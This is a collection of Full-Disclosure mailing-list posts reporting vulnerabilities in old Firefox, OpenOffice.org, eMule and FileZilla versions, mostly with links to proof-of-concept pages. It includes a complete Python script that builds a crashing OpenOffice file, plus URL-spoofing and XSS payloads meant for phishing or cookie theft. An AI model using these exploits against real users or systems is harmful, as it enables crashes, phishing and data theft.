[Full-disclosure] Firefox 3.0.8 remote DoS: 0-day exploit
I found an unpatched vulnerability in the latest Firefox 3.0.8 allows a remote attacker to cause a DoS. A 0-day exploit is available here: http://carl-hardwick.googlegroups.com/web/Firefox+3.0.8+DoS.htm?gda=i_oPfkcAAACkS-ZCh60y1HGkG90OfxntdaCvR5MIFXIiKOQt5O80jPqLKEFpBrbag3mOAa49_d8xnmtLTzx06f-L8nRUL3egeV4duv6pDMGhhhZdjQlNAw&gsc=HORKjws1umYfXMbeoe6wr8IrMRRv ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Firefox 3.0.5 remote vulnerability via queryCommandState
An unpatched security flaw has been discovered in the latest version of Firefox 3.0.5 which allows a remote attacker to crash the browser with a special crafted HTML page using a queryCommandState: PoC: http://groups.google.it/group/carl-hardwick/web/Firefox305RemoteDoS.htm ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] new unpatched security flaw found Firefox 3.0.4
New unpatched security flaw found in Firefox 3.0.4 PoC here: https://bugzilla.mozilla.org/attachment.cgi?id=302699 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Flaw in eMule 0.49: it exposes the OS user account name when it sends the shared files list
eMule 0.49 and previous versions could expose the OS user account name when it sends the shared files list. When an user asks for the shared files list of another user, the full path of folders are sent and they're fully visible into the emule log. example: Requesting shared files from 'yohan' User yohan (1507...) shares directory 'C:\Documents and Settings\Jean-Denis\My documents\...' OS user account name Jean-Denis is visible and could be used in further attacks. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Flaw in Firefox 3.0: protocol-handler.warn-external are ignored
these protocol-handler security settings are ignored although they're set to 'true' and no warnings are shown: network.protocol-handler.warn-external.mailto network.protocol-handler.warn-external.news network.protocol-handler.warn-external.nntp network.protocol-handler.warn-external.snews (in about:config) For example, I set network.protocol-handler.warn-external.mailto to 'true', clicked on an e-mail link and Windows Mail is launched without any warnings (tested on Firefox 3.0 on Windows Vista SP1) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Security issue in Filezilla 3.0.9.2: passwords are stored in plain text (sitemanager.xml)
A security issue in Filezilla 3.0.9.2 (and previous versions) allows local users to retrieve all saved passwords because they're stored in a plain text sitemanager.xml ftpspace.domain.com 21 0 0 1 [EMAIL PROTECTED] I'mAPlainTextPassword ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Firefox 2.0.0.12 IFrame overflow vulnerability
Firefox 2.0.0.12 IFrame overflow vulnerability PoC here: http://carl-hardwick.googlegroups.com/web/Firefox2.0.0.12IFrameDoS.htm?gda=4JPX1k0rdYnIsP_RGVzLBfeWBaUmJHMhbJyqNDyI290QuyyeUGG1qiJ7UbTIup-M2XPURDQ_Vb1oK3VK3gLweoqlIdXNbMjh5chVoSCmWxyNoTvcEg ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Firefox URI Spoofing Revisited
http://www.0x00.com/ I talked about this before in a previous post. Mozilla pointed me on a flaw, and I went back to investigate it some more. I turns out that I'm right after all but in a different setting, but with the same idea. The below vector can be used to trick filters or surfers into performing various things. One of them is to steal cookies from surfers who think that the URI we give them is legit, or phish for credentials by setting up a cloned GMail page. This is due to the empty user name: http://:[EMAIL PROTECTED] Normally when you fill in the user name like: http://foo:[EMAIL PROTECTED] it will give a warning, which it should. But without a user name it won't give us a warning, and thereby tricking Firefox to strip the whole part before the at-sign and go to the domain after the at-sign. This can be dangerous in some ways, because of the unknown potential it holds. Triggering or bypassing RegEx filters who only look for a white-listed domain are some of the possibilities. Anyway, I thought it was worth mentioning it. Here we can trick users into triggering a XSS on stumbleupon: http://:[EMAIL PROTECTED]/create_campaign.php?url=">http://www.0x00.com/x.js><" To obfuscate it, one can encode it or put a lot of spaces between: http://:www.gmail.com@phishdomain ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Firefox 2.0.0.12 information leak vulnerability
Don't blame the extension developers this time :) You probably thought otherwise after they just released version 2.0.0.12. a couple of hours ago, that had a fix for numerous other vulnerabilities. But guess what? we are going to see 2.0.0.13 pretty soon I guess. I snared at Mozilla before: don't patch vulnerabilities for fifty percent, take the time and fix the cause. Because directory traversal through plugins is all nice and such, we don't need it. We can trick Firefox itself in traversing directories back. I found another information leak that is very serious because we are able to read out all preferences set in Firefox, or just open or include about every file stored in the Mozilla program files directory, and this without any mandatory settings or plugins. In the vulnerability we make use of the 'view-source:' scheme that allows us to source out the 'resource:' scheme. With it, we can view the source of any file located in the 'resource:///' directory, which translates back to: file:///C:/Program Files/Mozilla Firefox/. Then we only include the file inside it and it becomes available to a new page's DOM, and so we are able to read all settings. Other issues can emerge also, this is only a short-hand proof of concept. Like always, more is possible. While chatting with Gareth Heyes, I came up with the vector in a couple of minutes. We talked about more issues which we probably are going to discuss very soon. /* @name: Firefox <= 2.0.0.12 information leak pOc @date: Feb. 07 2008 @author: Ronald van den Heetkamp @url: http://www.0x00.com */ pref = function(a,b) { document.write( a + ' -> ' + b + '
'); }; ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Firefox 2.0.0.12 SSL Spoofing and Domain Guessing vulnerabilities
Firefox seems to have trouble with defining the proper hostname when requesting a ssl connection. I was able to trick Firefox in thinking the hostname behind the at-sign is legit and the same as the URI that requested an ssl connection, and this without a warning. PoC: https://[EMAIL PROTECTED] You can add as much garbage between .com and the @ sign. So what else can we do? PoC: [EMAIL PROTECTED] [EMAIL PROTECTED] ah heck we don't need that at all: [EMAIL PROTECTED] works fine also :) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Firefox 2.0.0.11 Chrome Privilege Escalation PoC
Gerry Eisenhaur came with a surprising post
http://www.hiredhacker.com/2008/01/19/firefox-chrome-url-handling-directory-traversal/
. Gerry found a issue in Firefox that allows chrome privilege
escalation. This is due to weak normalization between URI's that are
handled and passed through Firefox with various path encoding methods.
It's a common mistake in browser software not to translate encoded
values back to their correct values and meaning. I wrote about the
same kind of issue before, that only involved a non-malicious example
of traversing directories through the resource:// pointer. This one by
Gerry is far worse, and I really hope browser vendors take a little
more care in handling any resource identifier internally, because this
can lead to serious issues.
Gerry released a pOc that requires the downbar plugin:
pref = function(x, y){document.write(x + ' -> ' + y +
'
');};
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Firefox 2.0.0.11 File Focus Stealing vulnerability
Firefox 2.0.0.11 File Focus Stealing vulnerability: Sorry Mozilla, but the recent file focus fix was not enough. I think Mozilla made another mistake while fixing the previous file/label issue. Because now I embed a file field and a textfield inside one label. When this happens, and you type only one time in the textfield, the focus travels to the file field and the value travels with it. Back to the drawing board I would say. I only got it to work in Firefox, Gareth checked Safari for me, and it also works in Safari. I guess this type of exploit could function on other HTML objects as well, and could be very dangerous because it only requires a one time focus in a textfield. PoC here: http://carl-hardwick.googlegroups.com/web/Firefox20011StealFocusFlaw.htm ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Firefox 2.0.0.9 remote DoS vulnerability
A new flaw discovered in the lastest Firefox 2.0.0.9 allows a remote attacker to crash the browser causing a DoS. PoC here: http://www.0x00.com/lab/t.html ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Firefox 2.0.0.7 has a very serious calculation bug
There's a flaw in Firefox 2.0.0.7 allows javascript to execute wrong subtractions. PoC concept here: javascript:5.2-0.1 (copy this code into address bar) Firefox 2.0.0.7 result: 5.1005 (WRONG!) Internet Explorer 7 result: 5.1 (OK) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Firefox 2.0.0.6 still vulnerable to URI flaw
http://xs-sniper.com/blog/2007/09/01/firefox-file-handling-woes/ , Nate and I have discovered a way to "…exploit a common handler with a single unexpected URI…" Once again, these URI payloads can be passed by the mailto, nntp, news, and snews URIs, allowing us to pass the payload without any user interaction. So, it seems that although the conditions which allowed for remote command execution in Firefox 2.0.0.5 have been addressed with a security patch, the underlying file type handling issues which are truly the heart of the issue have NOT been addressed. We contacted Mozilla a while ago about the issue and they are working on it. We're going to refrain from giving out the exact details of how this particular issue is executed (based mainly on the efforts and conversations we've had with Jesse Ruderman), but we'll include a screenshot of a payload in action. In the screenshot below, we use the mailto URI, which passes the URI to the Windows File Handler, which calls the appropriate program (in this case Windows Scripting Host), which in turn calls our attacker controlled file. We've purposely pointed the Windows Scripting Host to a file that doesn't exist as the error message allows the user to see that WSH is using the URI passed from Firefox. PoC here: http://xs-sniper.com/blog/wp-content/uploads/2007/09/file-handling.jpg ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Found a lot of sites exploiting Firefox URI vulnerability!!! - part 2
Daniel, you have to use an Italian IP, because this is Gromozon. All sites are active and they're exploiting firefox URI vulnerability. If you try to visit these sites with IE7, a new firefox instance is launched with exploit ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Firefox 2.0.0.6 Remote Variable Leakage vulnerability
Firefox Remote Variable Leakage It is possible to read all variables that are set inside Firefox. That's right: ALL variables and registered objects that are present inside Javascript files and on runtime. It's even possible to call certain functions. That ranges from local Mozilla config files to all extensions registered inside Firefox. The example below will show you a list of a couple variables that were set. Note: it is possible to actively scan variables and hijack them when you need to. I've tested this against my own Firefox extension called: Fire Encrypter. And I was able to steal a dynamically generated password successfully. PoC here: http://www.0x00.com/hacks/firefox/variables.html ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Firefox Remote Variable Leakage vulnerability
Firefox Remote Variable Leakage It is possible to read all variables that are set inside Firefox. That's right: ALL variables and registered objects that are present inside Javascript files and on runtime. It's even possible to call certain functions. That ranges from local Mozilla config files to all extensions registered inside Firefox. The example below will show you a list of a couple variables that were set. Note: it is possible to actively scan variables and hijack them when you need to. I've tested this against my own Firefox extension called: Fire Encrypter. And I was able to steal a dynamically generated password successfully. PoC here: http://www.0x00.com/hacks/firefox/variables.html ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Firefox 2.0.0.6 Java Pop-Up DoS flaw
@Daniel Veditz IE6 SP2 and IE7 are not affected! ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Firefox 2.0.0.6 Java Pop-Up DoS flaw
A flaw in Firefox 2.0.0.6 allows to open multiple java pop-up windows, without having the possibility to close them. This could cause a DoS and the user have to close the browser in order to continue browsing in peace. PoC here: http://carl-hardwick.googlegroups.com/web/Firefox2.0.0.6JavaPopUpDoS.htm ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Firefox 2.0.0.5 flaw allows to steal the user's passwords
Firefox 2.0.0.5 flaw allows to steal the user's passwords PoC here: http://www.heise-security.co.uk/services/browsercheck/demos/moz/pass1.shtml ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] New flaw found in Firefox 2.0.0.4: Firefox file input focus vulnerabilities
PoC here: http://yathong.googlepages.com/FirefoxFocusBug.html The vulnerability allows the attacker to silently redirect focus of selected key press events to an otherwise protected file upload form field. This is possible because of how onKeyDown event is handled, allowing the focus to be moved between the two. This enables the attacker to read arbitrary files on victim's system. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] New flaw found in Firefox 2.0.0.4: Firefox file input focus vulnerabilities
New flaw found in Firefox 2.0.0.4: Firefox file input focus vulnerabilities: This demo is very simple. when you input some text in the textarea, the file input element's value will also change to it. I tested it on Firefox 1.5.0.12 and 2.0.0.4. PoC here: http://yathong.googlepages.com/FirefoxFocusBug.html credits by - Hong ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] 6 Month Vista Vuln Report, Debunked
http://www.ubuntulive.com/cs/ubuntu/view/e_spkr/3455 Kristian Hermansen he served as President and later Vice President of the local Linux User Group ROTFL ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Firefox 2.0.0.4 0day local file reading flaw
Firefox 2.0.0.4 is still vulnerable to 0day local file reading Proof of Concept: http://larholm.com/misc/ffresourcefile.html ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] OpenOffice.org 2.2.0 Writer DoS vulnerability
import sys
import time
print ""
print " OpenOffice.org 2.2.0 Writer Denial of Service "
print " url: http://www.openoffice.org/"
print ""
print " author: shinnai"
print " mail: shinnai[at]autistici[dot]org "
print " site: http://shinnai.altervista.org"
print ""
print " If you want, you can change the file extension in .doc "
print ""
exploit = \
"\xD0\xCF\x11\xE0\xA1\xB1\x1A\xE1\x00\x00\x00\x00\x00\x00\x00\x00"+\
"\x00\x00\x00\x00\x00\x00\x00\x00\x3E\x00\x03\x00\xFE\xFF\x09\x00"+\
"\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00"+\
"\x2A\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+\
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xEC\xA5\xC1\x00\x23\x60\x10\x04\x00\x00\xF0\x12\xBF\x00\x00\x00"+\
"\x00\x00\x00\x10\x00\x00\x00\x00\x00\x06\x00\x00\x01\x08\x00\x00"+\
"\x0E\x00\x62\x6A\x62\x6A\x35\x47\x35\x47"
while 1:
print " OPTIONS "
print " 1 -> Create file exploit.otp "
print " 2 -> Quit\n"
print ""
choice = 0
while 1:
try:
choice = int(raw_input("Make your choice: "))
if choice != 1 and choice != 2:
print "ehm... Invalid choice...\n"
else:
break
except:
print "ehm... Invalid choice...\n"
if choice == 1:
flag = 1
try:
fileOut = open('exploit.otp','w')
fileOut.write(exploit)
fileOut.close()
print "File created!\nBe safe!"
except:
print "Unable to create file."
if choice == 2:
print "Be safe!"
time.sleep(2)
sys.exit()
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] OpenOffice.org 2.2.0 Writer DoS vulnerability
OpenOffice.org 2.2.0 Writer DoS vulnerability PoC: http://www.shinnai.altervista.org/exploits/openofficewriter.py ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Firefox 2.0.0.3 Out-of-bounds memory access via specialy crafted html file
Product: Firefox 2.0.0.3 Description: Out-of-bounds memory access via specialy crafted html file Type: Remote Vulnerability can be exploited by using a large value in a href tag to create an out-of-bounds memory access. Proof Of Concept exploit: http://www.critical.lt/research/opera_die_happy.html ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Firefox 2.0.0.3 non-existent applet DoS flaw
Firefox 2.0.0.3 is unable to handle a multiple request of non-existent applet so, after some page refresh, crashes or stops to answer. You can try this exploit here www.shinnai.altervista.org/nea.html but, if so, you need a little patience 'cause it's too slow than from local exploitation. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Firefox 2.0.0.3 DoS crash
Firefox 2.0.0.3 DoS crash PoC: chrome://pippki/content/editcacert.xul chrome://pippki/content/editemailcert.xul chrome://pippki/content/editsslcert.xul ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Firefox 2.0.0.3 Phishing Protection Bypass Vulnerability
This flaw http://kaneda.bohater.net/security/20070111-firefox_2.0.0.1_bypass_phishing_protection.php remains upatched since months!!! Firefox 2.0.0.1, 2.0.0.2, 2.0.0.3 are still vulnerable! https://bugzilla.mozilla.org/show_bug.cgi?id=367538 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Internet Explorer Crash
Mozilla Firefox 2.0.0.3 is also vulnerable ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
